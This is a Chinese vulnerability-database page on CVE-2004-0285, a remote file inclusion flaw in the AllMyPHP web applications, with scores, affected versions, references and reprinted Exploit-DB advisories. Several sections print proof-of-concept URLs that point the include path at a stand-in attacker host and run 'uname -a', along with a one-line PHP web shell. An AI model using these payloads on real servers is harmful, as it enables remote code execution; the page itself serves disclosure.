CVE-2004-0285
CVSS7.5
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:43:09
NMCOES    

[原文]PHP remote file inclusion vulnerabilities in include/footer.inc.php in (1) AllMyVisitors, (2) AllMyLinks, and (3) AllMyGuests allow remote attackers to execute arbitrary PHP code via a URL in the _AMVconfig[cfg_serverpath] parameter.


[CNNVD]Voice Of Web AllMyPHP远程文件包含漏洞(CNNVD-200411-142)

        
        AllMyPHP是开发专业WEB的解决方案,包含如AllMyGuests, AllMyLinks, AllMyVisitors等应用程序。
        AllMyPHP包含的多个应用程序对URI传递的变量缺少充分过滤,远程攻击者可以利用这个漏洞以WEB进程权限执行任意代码。
        AllMyPHP包含的AllMyGuests, AllMyLinks和AllMyVisitors应用程序在调用'require_once()'时不充分过滤URI中的变量数据,可指定远程服务器上的文件作为包含文件,可以WEB进程权限执行包含文件中的任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:voice_of_web:allmyguests:0.4.1
cpe:/a:voice_of_web:allmyguests:0.4
cpe:/a:voice_of_web:allmyguests:0.1.2
cpe:/a:voice_of_web:allmyguests:0.3
cpe:/a:voice_of_web:allmylinks:0.4
cpe:/a:voice_of_web:allmylinks:0.5
cpe:/a:voice_of_web:allmyvisitors:0.4
cpe:/a:voice_of_web:allmylinks:0.3
cpe:/a:voice_of_web:allmyvisitors:0.3
cpe:/a:voice_of_web:allmylinks:0.4.9
cpe:/a:voice_of_web:allmylinks:0.4.4
cpe:/a:voice_of_web:allmylinks:0.4.3
cpe:/a:voice_of_web:allmylinks:0.4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0285
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-142
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107696209514155&w=2
(UNKNOWN)  BUGTRAQ  20040214 AllMyGuests PHP Code Injection vulnerability
http://marc.info/?l=bugtraq&m=107696235424865&w=2
(UNKNOWN)  BUGTRAQ  20040214 AllMyVisitors PHP Code Injection vulnerability
http://marc.info/?l=bugtraq&m=107696291728750&w=2
(UNKNOWN)  BUGTRAQ  20040214 AllMyLinks PHP Code Injection vulnerability
http://www.securityfocus.com/bid/9664
(VENDOR_ADVISORY)  BID  9664
http://xforce.iss.net/xforce/xfdb/15226
(VENDOR_ADVISORY)  XF  allmylinks-file-include(15226)
http://xforce.iss.net/xforce/xfdb/15227
(VENDOR_ADVISORY)  XF  allmyguests-php-file-include(15227)
http://xforce.iss.net/xforce/xfdb/15228
(UNKNOWN)  XF  allmyvisitors-file-include(15228)

- 漏洞信息

Voice Of Web AllMyPHP远程文件包含漏洞
高危 输入验证
2004-11-23 00:00:00 2007-03-30 00:00:00
远程  
        
        AllMyPHP是开发专业WEB的解决方案,包含如AllMyGuests, AllMyLinks, AllMyVisitors等应用程序。
        AllMyPHP包含的多个应用程序对URI传递的变量缺少充分过滤,远程攻击者可以利用这个漏洞以WEB进程权限执行任意代码。
        AllMyPHP包含的AllMyGuests, AllMyLinks和AllMyVisitors应用程序在调用'require_once()'时不充分过滤URI中的变量数据,可指定远程服务器上的文件作为包含文件,可以WEB进程权限执行包含文件中的任意代码。
        

- 公告与补丁

        厂商补丁:
        Voice Of Web
        ------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.php-resource.net/index.php

- 漏洞信息 (23697)

AllMyGuests 0.x info.inc.php Arbitrary Code Execution (EDBID:23697)
php webapps
2004-02-16 Verified
0 Pablo Santana
N/A [点击下载]
source: http://www.securityfocus.com/bid/9664/info

Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.

This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.

http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a

www.example.org/attacker.php' will contain:

<?php
system("$cmd");
?>		

- 漏洞信息 (23698)

AllMyVisitors 0.x info.inc.php Arbitrary Code Execution (EDBID:23698)
php webapps
2004-02-16 Verified
0 Pablo Santana
N/A [点击下载]
source: http://www.securityfocus.com/bid/9664/info
 
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
 
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
 
http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
 
www.example.org/attacker.php' will contain:
 
<?php
system("$cmd");
?>
		

- 漏洞信息 (23699)

AllMyLinks 0.x footer.inc.php Arbitrary Code Execution (EDBID:23699)
php webapps
2004-02-16 Verified
0 Pablo Santana
N/A [点击下载]
source: http://www.securityfocus.com/bid/9664/info
  
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
  
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.

http://www.example.com/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a

www.example.org/attacker.php' will contain:
  
<?php
system("$cmd");
?>
		

- 漏洞信息

6719
AllMyGuests info.inc.php Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

AllMyGuests contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when modifying the "_AMVconfig[cfg_serverpath]" parameter to reference a URL on a remote web server that contains "template.inc.php". It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-02-14 Unknow
2004-02-14 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Voice Of Web AllMyPHP Remote File Include Vulnerabilities
Input Validation Error 9664
Yes No
2004-02-16 12:00:00 2009-07-12 03:06:00
Disclosure of these issues has been credited to Pablo Santana <m4dsk4t3r@hotmail.com>.

- 受影响的程序版本

Voice Of Web AllMyVisitors 0.4
Voice Of Web AllMyVisitors 0.3
Voice Of Web AllMyLinks 0.5
Voice Of Web AllMyLinks 0.4.9
Voice Of Web AllMyLinks 0.4.4
Voice Of Web AllMyLinks 0.4.3
Voice Of Web AllMyLinks 0.4.1
Voice Of Web AllMyLinks 0.4
Voice Of Web AllMyLinks 0.3
Voice Of Web AllMyGuests 0.4.1
Voice Of Web AllMyGuests 0.4
Voice Of Web AllMyGuests 0.3
Voice Of Web AllMyGuests 0.1.2

- 漏洞讨论

Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.

This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.

- 漏洞利用

There is no exploit required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&amp;cmd=uname%20-a
http://www.example.com/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.example.org/attacker.php/&amp;cmd=uname%20-a
http://www.example.com/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.example.org/attacker.php/&amp;cmd=uname%20-a

In all cases 'www.example.org/attacker.php' will contain:

&lt;?php
system("$cmd");
?&gt;

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站